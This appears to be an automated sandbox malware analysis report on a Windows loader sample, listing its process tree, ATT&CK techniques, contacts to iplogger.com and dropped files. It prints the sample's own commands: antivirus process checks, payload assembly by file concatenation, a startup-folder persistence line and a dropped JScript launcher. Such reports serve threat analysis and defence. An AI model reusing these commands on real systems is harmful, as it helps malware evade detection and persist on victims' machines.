Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 103495Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "aroundaccommodategroupseverything" Fine Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Correct + ..\Transparent + ..\Barbie + ..\Gloves + ..\Latin + ..\Story + ..\Ski + ..\Appraisal nJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Powder.pif nJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\O"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardiancryptoelite.url" & echo url="c:\users\user\appdata\local\guardiancrypto systems inc\guardiancryptoelite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardiancryptoelite.url" & exit
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardiancryptoelite.url" & echo url="c:\users\user\appdata\local\guardiancrypto systems inc\guardiancryptoelite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardiancryptoelite.url" & exitJump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E588CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00E588CD
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E64F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00E64F1C
Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.0000000002980000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmp, Powder.pif, 0000000A.00000003.1761264512.0000000004589000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Powder.pif, GuardianCryptoElite.scrBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E2885B cpuid 10_2_00E2885B
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E40030 GetLocalTime,__swprintf,10_2_00E40030
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E40722 GetUserNameW,10_2_00E40722
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E3416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_00E3416A
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: GuardianCryptoElite.scrBinary or memory string: WIN_81
Source: GuardianCryptoElite.scrBinary or memory string: WIN_XP
Source: GuardianCryptoElite.scrBinary or memory string: WIN_XPe
Source: GuardianCryptoElite.scrBinary or memory string: WIN_VISTA
Source: GuardianCryptoElite.scrBinary or memory string: WIN_7
Source: GuardianCryptoElite.scrBinary or memory string: WIN_8
Source: Serious.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E7696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_00E7696E
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pifCode function: 10_2_00E76E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00E76E32
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_0095696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,16_2_0095696E
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scrCode function: 16_2_00956E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,16_2_00956E32
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information11
Scripting
2
Valid Accounts
1
Windows Management Instrumentation
11
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
4
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol21
Input Capture
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager3
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
Software Packing
NTDS17
System Information Discovery
Distributed Component Object ModelInput Capture4
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
1
DLL Side-Loading
LSA Secrets1
Query Registry
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder
11
Masquerading
Cached Domain Credentials131
Security Software Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
Valid Accounts
DCSync4
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation
Proc Filesystem1
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection
/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
System Network Configuration Discovery
Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532361 Sample: cW5i0RdQ4L.exe Startdate: 13/10/2024 Architecture: WINDOWS Score: 96 45 iplogger.com 2->45 47 SfqIcJOQLLJLIQzEeYKSUBXfTZxPy.SfqIcJOQLLJLIQzEeYKSUBXfTZxPy 2->47 53 Multi AV Scanner detection for dropped file 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 Sigma detected: Search for Antivirus process 2->57 59 5 other signatures 2->59 10 cW5i0RdQ4L.exe 19 2->10         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 15 cmd.exe 2 10->15         started        65 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->65 19 GuardianCryptoElite.scr 12 12->19         started        process6 file7 43 C:\Users\user\AppData\Local\...\Powder.pif, PE32 15->43 dropped 51 Drops PE files with a suspicious file extension 15->51 21 Powder.pif 16 15->21         started        26 cmd.exe 2 15->26         started        28 conhost.exe 15->28         started        30 7 other processes 15->30 signatures8 process9 dnsIp10 49 iplogger.com 104.21.76.57, 443, 49731, 49737 CLOUDFLARENETUS United States 21->49 39 C:\Users\user\...behaviorgraphuardianCryptoElite.scr, PE32 21->39 dropped 41 C:\Users\user\...behaviorgraphuardianCryptoElite.js, ASCII 21->41 dropped 61 Multi AV Scanner detection for dropped file 21->61 63 Drops PE files with a suspicious file extension 21->63 32 cmd.exe 2 21->32         started        file11 signatures12 process13 file14 37 C:\Users\user\...behaviorgraphuardianCryptoElite.url, MS 32->37 dropped 35 conhost.exe 32->35         started        process15

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
cW5i0RdQ4L.exe14%VirustotalBrowse
cW5i0RdQ4L.exe8%ReversingLabs
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr5%ReversingLabs
C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr10%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\103495\Powder.pif5%ReversingLabs
C:\Users\user\AppData\Local\Temp\103495\Powder.pif10%VirustotalBrowse
No Antivirus matches
SourceDetectionScannerLabelLink
iplogger.com1%VirustotalBrowse
SourceDetectionScannerLabelLink
http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
https://iplogger.com/R1%VirustotalBrowse
https://iplogger.com/m1%VirustotalBrowse
https://www.autoitscript.com/autoit3/0%VirustotalBrowse
https://iplogger.com/1%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
iplogger.com
104.21.76.57
truefalseunknown
SfqIcJOQLLJLIQzEeYKSUBXfTZxPy.SfqIcJOQLLJLIQzEeYKSUBXfTZxPy
unknown
unknownfalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://iplogger.com/15RZZ4false
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://iplogger.com/15RZZ4OPowder.pif, 0000000A.00000002.3572166645.00000000043D6000.00000004.00000800.00020000.00000000.sdmpfalse
        unknown
        http://www.autoitscript.com/autoit3/JcW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3570670968.00000000009A9000.00000002.00000001.01000000.0000000A.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.drfalseunknown
        https://iplogger.com/mGuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D1E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        https://iplogger.com/15RZZ4eListcessId;GuardianCryptoElite.scr, 00000010.00000002.3571413798.000000000153A000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://nsis.sf.net/NSIS_ErrorErrorcW5i0RdQ4L.exefalse
          • URL Reputation: safe
          unknown
          https://iplogger.com/15RZZ40Powder.pif, 0000000A.00000002.3571443767.0000000001B30000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://www.autoitscript.com/autoit3/cW5i0RdQ4L.exe, 00000000.00000003.1715750993.000000000298E000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000003.1761392770.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp, GuardianCryptoElite.scr.10.dr, Powder.pif.1.dr, Serious.0.drfalseunknown
            https://iplogger.com/RGuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D1E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            https://iplogger.com/Powder.pif, 0000000A.00000002.3571443767.00000000019C9000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            104.21.76.57
            iplogger.comUnited States
            13335CLOUDFLARENETUSfalse
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1532361
            Start date and time:2024-10-13 02:06:27 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 8m 50s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Run name:Run with higher sleep bypass
            Number of analysed new started processes analysed:20
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:cW5i0RdQ4L.exe
            renamed because original name is a hash value
            Original Sample Name:c065ba22909fc8dbded4ea0eebb24ad5.exe
            Detection:MAL
            Classification:mal96.expl.evad.winEXE@28/18@3/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 104
            • Number of non-executed functions: 297
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.
            TimeTypeDescription
            01:07:32AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url
            20:08:07API Interceptor7056x Sleep call for process: Powder.pif modified
            20:08:23API Interceptor6074x Sleep call for process: GuardianCryptoElite.scr modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            104.21.76.57Activator by URKE v2.5.exeGet hashmaliciousLummaCBrowse
              SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeGet hashmaliciousUnknownBrowse
                file.exeGet hashmaliciousDarkTortilla, PureLog StealerBrowse
                  file.exeGet hashmaliciousDarkTortillaBrowse
                    Setup3.exeGet hashmaliciousUnknownBrowse
                      file.exeGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.Trojan.DownLoaderNET.786.29532.16195.exeGet hashmaliciousDarkTortilla, NeoreklamiBrowse
                          file.exeGet hashmaliciousAmadey, Cryptbot, Neoreklami, PureLog Stealer, RedLine, Stealc, VidarBrowse
                            LisectAVT_2403002A_340.exeGet hashmaliciousCryptbotBrowse
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              iplogger.comActivator by URKE v2.5.exeGet hashmaliciousLummaCBrowse
                              • 172.67.188.178
                              SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeGet hashmaliciousUnknownBrowse
                              • 104.21.76.57
                              file.exeGet hashmaliciousDarkTortilla, PureLog StealerBrowse
                              • 104.21.76.57
                              file.exeGet hashmaliciousDarkTortillaBrowse
                              • 104.21.76.57
                              Setup3.exeGet hashmaliciousUnknownBrowse
                              • 104.21.76.57
                              file.exeGet hashmaliciousUnknownBrowse
                              • 104.21.76.57
                              SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exeGet hashmaliciousDarkTortillaBrowse
                              • 172.67.188.178
                              file.exeGet hashmaliciousDarkTortillaBrowse
                              • 172.67.188.178
                              yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                              • 172.67.188.178
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CLOUDFLARENETUSSetup.exeGet hashmaliciousLummaCBrowse
                              • 172.67.206.204
                              OceanicTools.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                              • 104.26.13.205
                              Setup-Premium.exeGet hashmaliciousLummaCBrowse
                              • 104.21.79.35
                              v.1.6.3__x64__.msiGet hashmaliciousLegionLoaderBrowse
                              • 172.67.221.87
                              phantomtoolsv2.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                              • 104.26.13.205
                              FluxusV2.exeGet hashmaliciousPython Stealer, CStealerBrowse
                              • 104.26.3.16
                              Solara.exeGet hashmaliciousLummaCBrowse
                              • 104.21.77.78
                              file.exeGet hashmaliciousLummaCBrowse
                              • 172.67.206.204
                              file.exeGet hashmaliciousLummaCBrowse
                              • 172.67.206.204
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              37f463bf4616ecd445d4a1937da06e19OceanicTools.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                              • 104.21.76.57
                              v.1.6.3__x64__.msiGet hashmaliciousLegionLoaderBrowse
                              • 104.21.76.57
                              phantomtoolsv2.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                              • 104.21.76.57
                              bot.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                              • 104.21.76.57
                              narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                              • 104.21.76.57
                              v.1.5.4__x64__.msiGet hashmaliciousLegionLoaderBrowse
                              • 104.21.76.57
                              SecuriteInfo.com.FileRepMalware.1304.4177.exeGet hashmaliciousUnknownBrowse
                              • 104.21.76.57
                              SecuriteInfo.com.FileRepMalware.1304.4177.exeGet hashmaliciousUnknownBrowse
                              • 104.21.76.57
                              Synaptics.exeGet hashmaliciousXRedBrowse
                              • 104.21.76.57
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr67079aecc452b_xin.exeGet hashmaliciousUnknownBrowse
                                6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                  hlyG1m5UmO.exeGet hashmaliciousStealc, VidarBrowse
                                    file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                      M13W1o3scc.exeGet hashmaliciousStealcBrowse
                                        down.exeGet hashmaliciousUnknownBrowse
                                          file.exeGet hashmaliciousLummaCBrowse
                                            file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                              InstallSetup.exeGet hashmaliciousStealcBrowse
                                                Process:C:\Users\user\AppData\Local\Temp\103495\Powder.pif
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):200
                                                Entropy (8bit):4.7726006397149705
                                                Encrypted:false
                                                SSDEEP:6:RiJBJHonwWDKaJkDB+Mak7WkMu8HMaz7ywWDKaJkDB+Mak7WkMu05M:YJ7QjWaCzaUW5iaKWaCzaUW54
                                                MD5:BFDBD4EE5EB9C2BDFA1F82BDFBC7BD5E
                                                SHA1:54C5BB227D5D70B78F24070733240AE4BFCCB4C3
                                                SHA-256:A083D0F2ACB982E82B982304EB96F97C8AFD3C9762A57F1835ABBA1A50D06DF3
                                                SHA-512:3B64BE15C7652FC1585B0857A4BBFDD1038F621E9605C377BBE8E96F98AFC168FD599C77AD2717711272426DF1486D63D5A06546BD02D69BCA6D4DF7969015D1
                                                Malicious:true
                                                Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\GuardianCrypto Systems Inc\\GuardianCryptoElite.scr\" \"C:\\Users\\user\\AppData\\Local\\GuardianCrypto Systems Inc\\O\"")
                                                Process:C:\Users\user\AppData\Local\Temp\103495\Powder.pif
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):893608
                                                Entropy (8bit):6.62028134425878
                                                Encrypted:false
                                                SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 5%
                                                • Antivirus: Virustotal, Detection: 10%, Browse
                                                Joe Sandbox View:
                                                • Filename: 67079aecc452b_xin.exe, Detection: malicious, Browse
                                                • Filename: 6706e721f2c06.exe, Detection: malicious, Browse
                                                • Filename: hlyG1m5UmO.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: M13W1o3scc.exe, Detection: malicious, Browse
                                                • Filename: down.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: InstallSetup.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\AppData\Local\Temp\103495\Powder.pif
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):589559
                                                Entropy (8bit):7.999707598770209
                                                Encrypted:true
                                                SSDEEP:12288:+WPM1wUWq0fYgJafcwbk88kntuz+WrR9sv9mkkNVTJMa:+WPiwfqGYgAfnU6CR9Pk+TJMa
                                                MD5:D61BFD64FBF003BA89A0038E38339DF6
                                                SHA1:EF8F3EA9AA749EA516E2D62AE586680C4E14D4E5
                                                SHA-256:3133DFE772AFBE5FFD178038BEE3FF413665EC29A5565881D63BBB5370C58AF2
                                                SHA-512:56FBB30D2358297E662F19A6236C9E039D4EF78B97BAF34508A04C80388483B5EE17DD2CBA97A3BBBDCB4E28CE7D9322CFCAB3974718C65945265591E86BA09F
                                                Malicious:false
                                                Preview:oc...A.Pr;.........n.@..."w<..s...D1...........m..T#.}..}r.|.o..;d.T.0pI..a.J1.Q..r.d....Jw.-.....G...h$...}.13AW*.o}...J{.\....^.....8.N...%H..5...2S..h...j+yu....W..../$..%35E....,;.........S~.G.v...[$..~.i...4`^..)...U.KKX.l..%.=........2r.... .........}!..}~.B.Y?!.w...#..O..K.h?E..J..>4.........ox5......_.v.>..U.&_oBV.ko....(k....f...8.wZ*!....K...f,"T,)...7Z_.m.@J\.&....I......-....HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....D.M.'.F...h............................kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..w.R..,P..Myn.2..t.W.....|...0....R.....9.........m.......q8.5...x..2).U.j....>.p#.~.<...(..-...8..O....<{.,..}#......I......'..V-.._..`ER....Og].%..b.q
                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:modified
                                                Size (bytes):893608
                                                Entropy (8bit):6.62028134425878
                                                Encrypted:false
                                                SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 5%
                                                • Antivirus: Virustotal, Detection: 10%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):589559
                                                Entropy (8bit):7.999707598770209
                                                Encrypted:true
                                                SSDEEP:12288:+WPM1wUWq0fYgJafcwbk88kntuz+WrR9sv9mkkNVTJMa:+WPiwfqGYgAfnU6CR9Pk+TJMa
                                                MD5:D61BFD64FBF003BA89A0038E38339DF6
                                                SHA1:EF8F3EA9AA749EA516E2D62AE586680C4E14D4E5
                                                SHA-256:3133DFE772AFBE5FFD178038BEE3FF413665EC29A5565881D63BBB5370C58AF2
                                                SHA-512:56FBB30D2358297E662F19A6236C9E039D4EF78B97BAF34508A04C80388483B5EE17DD2CBA97A3BBBDCB4E28CE7D9322CFCAB3974718C65945265591E86BA09F
                                                Malicious:false
